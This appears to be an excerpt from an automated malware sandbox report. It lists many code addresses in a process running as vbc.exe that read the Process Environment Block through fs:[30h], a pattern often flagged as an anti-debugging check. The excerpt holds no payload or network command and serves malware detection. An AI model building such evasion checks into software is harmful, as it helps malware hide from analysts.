Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05812582 mov ecx, dword ptr fs:[00000030h] 5_2_05812582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05844588 mov eax, dword ptr fs:[00000030h] 5_2_05844588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580758F mov eax, dword ptr fs:[00000030h] 5_2_0580758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580758F mov eax, dword ptr fs:[00000030h] 5_2_0580758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580758F mov eax, dword ptr fs:[00000030h] 5_2_0580758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E59C mov eax, dword ptr fs:[00000030h] 5_2_0584E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589B594 mov eax, dword ptr fs:[00000030h] 5_2_0589B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589B594 mov eax, dword ptr fs:[00000030h] 5_2_0589B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h] 5_2_058315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h] 5_2_058315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h] 5_2_058315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h] 5_2_058315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h] 5_2_058315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058905A7 mov eax, dword ptr fs:[00000030h] 5_2_058905A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058905A7 mov eax, dword ptr fs:[00000030h] 5_2_058905A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058905A7 mov eax, dword ptr fs:[00000030h] 5_2_058905A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A35BA mov eax, dword ptr fs:[00000030h] 5_2_058A35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A35BA mov eax, dword ptr fs:[00000030h] 5_2_058A35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A35BA mov eax, dword ptr fs:[00000030h] 5_2_058A35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A35BA mov eax, dword ptr fs:[00000030h] 5_2_058A35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CF5BE mov eax, dword ptr fs:[00000030h] 5_2_058CF5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058345B1 mov eax, dword ptr fs:[00000030h] 5_2_058345B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058345B1 mov eax, dword ptr fs:[00000030h] 5_2_058345B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h] 5_2_0583F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h] 5_2_0583F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h] 5_2_0583F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h] 5_2_0583F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h] 5_2_0583F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h] 5_2_0583F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h] 5_2_0583F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h] 5_2_0583F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h] 5_2_0583F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058455C0 mov eax, dword ptr fs:[00000030h] 5_2_058455C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E55C9 mov eax, dword ptr fs:[00000030h] 5_2_058E55C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E5CF mov eax, dword ptr fs:[00000030h] 5_2_0584E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E5CF mov eax, dword ptr fs:[00000030h] 5_2_0584E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058165D0 mov eax, dword ptr fs:[00000030h] 5_2_058165D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584A5D0 mov eax, dword ptr fs:[00000030h] 5_2_0584A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584A5D0 mov eax, dword ptr fs:[00000030h] 5_2_0584A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E35D7 mov eax, dword ptr fs:[00000030h] 5_2_058E35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E35D7 mov eax, dword ptr fs:[00000030h] 5_2_058E35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E35D7 mov eax, dword ptr fs:[00000030h] 5_2_058E35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058395DA mov eax, dword ptr fs:[00000030h] 5_2_058395DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058125E0 mov eax, dword ptr fs:[00000030h] 5_2_058125E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h] 5_2_0583E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h] 5_2_0583E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h] 5_2_0583E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h] 5_2_0583E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h] 5_2_0583E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h] 5_2_0583E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h] 5_2_0583E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h] 5_2_0583E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584C5ED mov eax, dword ptr fs:[00000030h] 5_2_0584C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584C5ED mov eax, dword ptr fs:[00000030h] 5_2_0584C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h] 5_2_058315F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h] 5_2_058315F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h] 5_2_058315F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h] 5_2_058315F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h] 5_2_058315F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h] 5_2_058315F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05847505 mov eax, dword ptr fs:[00000030h] 5_2_05847505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05847505 mov ecx, dword ptr fs:[00000030h] 5_2_05847505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h] 5_2_058E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h] 5_2_058E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h] 5_2_058E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h] 5_2_058E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h] 5_2_058E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h] 5_2_058E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h] 5_2_058E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CB52F mov eax, dword ptr fs:[00000030h] 5_2_058CB52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h] 5_2_058BF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h] 5_2_058BF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h] 5_2_058BF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h] 5_2_058BF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h] 5_2_058BF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h] 5_2_058BF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h] 5_2_058BF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584D530 mov eax, dword ptr fs:[00000030h] 5_2_0584D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584D530 mov eax, dword ptr fs:[00000030h] 5_2_0584D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h] 5_2_0581D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h] 5_2_0581D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h] 5_2_0581D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h] 5_2_0581D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h] 5_2_0581D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h] 5_2_0581D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820535 mov eax, dword ptr fs:[00000030h] 5_2_05820535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820535 mov eax, dword ptr fs:[00000030h] 5_2_05820535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820535 mov eax, dword ptr fs:[00000030h] 5_2_05820535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820535 mov eax, dword ptr fs:[00000030h] 5_2_05820535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820535 mov eax, dword ptr fs:[00000030h] 5_2_05820535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820535 mov eax, dword ptr fs:[00000030h] 5_2_05820535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E5537 mov eax, dword ptr fs:[00000030h] 5_2_058E5537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h] 5_2_0583E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h] 5_2_0583E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h] 5_2_0583E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h] 5_2_0583E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h] 5_2_0583E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05818550 mov eax, dword ptr fs:[00000030h] 5_2_05818550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05818550 mov eax, dword ptr fs:[00000030h] 5_2_05818550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B562 mov eax, dword ptr fs:[00000030h] 5_2_0580B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584656A mov eax, dword ptr fs:[00000030h] 5_2_0584656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584656A mov eax, dword ptr fs:[00000030h] 5_2_0584656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584656A mov eax, dword ptr fs:[00000030h] 5_2_0584656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584B570 mov eax, dword ptr fs:[00000030h] 5_2_0584B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584B570 mov eax, dword ptr fs:[00000030h] 5_2_0584B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B480 mov eax, dword ptr fs:[00000030h] 5_2_0580B480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05819486 mov eax, dword ptr fs:[00000030h] 5_2_05819486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05819486 mov eax, dword ptr fs:[00000030h] 5_2_05819486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058164AB mov eax, dword ptr fs:[00000030h] 5_2_058164AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058434B0 mov eax, dword ptr fs:[00000030h] 5_2_058434B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058444B0 mov ecx, dword ptr fs:[00000030h] 5_2_058444B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589A4B0 mov eax, dword ptr fs:[00000030h] 5_2_0589A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E54DB mov eax, dword ptr fs:[00000030h] 5_2_058E54DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058104E5 mov ecx, dword ptr fs:[00000030h] 5_2_058104E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058B94E0 mov eax, dword ptr fs:[00000030h] 5_2_058B94E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05848402 mov eax, dword ptr fs:[00000030h] 5_2_05848402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05848402 mov eax, dword ptr fs:[00000030h] 5_2_05848402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05848402 mov eax, dword ptr fs:[00000030h] 5_2_05848402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583340D mov eax, dword ptr fs:[00000030h] 5_2_0583340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580E420 mov eax, dword ptr fs:[00000030h] 5_2_0580E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580E420 mov eax, dword ptr fs:[00000030h] 5_2_0580E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580E420 mov eax, dword ptr fs:[00000030h] 5_2_0580E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580C427 mov eax, dword ptr fs:[00000030h] 5_2_0580C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584A430 mov eax, dword ptr fs:[00000030h] 5_2_0584A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h] 5_2_0581B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h] 5_2_0581B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h] 5_2_0581B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h] 5_2_0581B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h] 5_2_0581B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h] 5_2_0581B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h] 5_2_0584E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h] 5_2_0584E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h] 5_2_0584E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h] 5_2_0584E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h] 5_2_0584E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h] 5_2_0584E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h] 5_2_0584E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h] 5_2_0584E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583245A mov eax, dword ptr fs:[00000030h] 5_2_0583245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580645D mov eax, dword ptr fs:[00000030h] 5_2_0580645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CF453 mov eax, dword ptr fs:[00000030h] 5_2_058CF453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05811460 mov eax, dword ptr fs:[00000030h] 5_2_05811460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05811460 mov eax, dword ptr fs:[00000030h] 5_2_05811460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05811460 mov eax, dword ptr fs:[00000030h] 5_2_05811460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05811460 mov eax, dword ptr fs:[00000030h] 5_2_05811460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05811460 mov eax, dword ptr fs:[00000030h] 5_2_05811460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h] 5_2_0582F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h] 5_2_0582F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h] 5_2_0582F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h] 5_2_0582F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h] 5_2_0582F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h] 5_2_0582F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E547F mov eax, dword ptr fs:[00000030h] 5_2_058E547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583A470 mov eax, dword ptr fs:[00000030h] 5_2_0583A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583A470 mov eax, dword ptr fs:[00000030h] 5_2_0583A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583A470 mov eax, dword ptr fs:[00000030h] 5_2_0583A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CF78A mov eax, dword ptr fs:[00000030h] 5_2_058CF78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058997A9 mov eax, dword ptr fs:[00000030h] 5_2_058997A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h] 5_2_0589F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h] 5_2_0589F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h] 5_2_0589F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h] 5_2_0589F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589F7AF mov eax, dword ptr fs:[00000030h] 5_2_0589F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058107AF mov eax, dword ptr fs:[00000030h] 5_2_058107AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583D7B0 mov eax, dword ptr fs:[00000030h] 5_2_0583D7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E37B6 mov eax, dword ptr fs:[00000030h] 5_2_058E37B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h] 5_2_0580F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h] 5_2_0580F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h] 5_2_0580F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h] 5_2_0580F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h] 5_2_0580F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h] 5_2_0580F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h] 5_2_0580F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h] 5_2_0580F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F7BA mov eax, dword ptr fs:[00000030h] 5_2_0580F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581C7C0 mov eax, dword ptr fs:[00000030h] 5_2_0581C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058157C0 mov eax, dword ptr fs:[00000030h] 5_2_058157C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058157C0 mov eax, dword ptr fs:[00000030h] 5_2_058157C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058157C0 mov eax, dword ptr fs:[00000030h] 5_2_058157C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581D7E0 mov ecx, dword ptr fs:[00000030h] 5_2_0581D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058327ED mov eax, dword ptr fs:[00000030h] 5_2_058327ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058327ED mov eax, dword ptr fs:[00000030h] 5_2_058327ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058327ED mov eax, dword ptr fs:[00000030h] 5_2_058327ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058147FB mov eax, dword ptr fs:[00000030h] 5_2_058147FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058147FB mov eax, dword ptr fs:[00000030h] 5_2_058147FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05817703 mov eax, dword ptr fs:[00000030h] 5_2_05817703
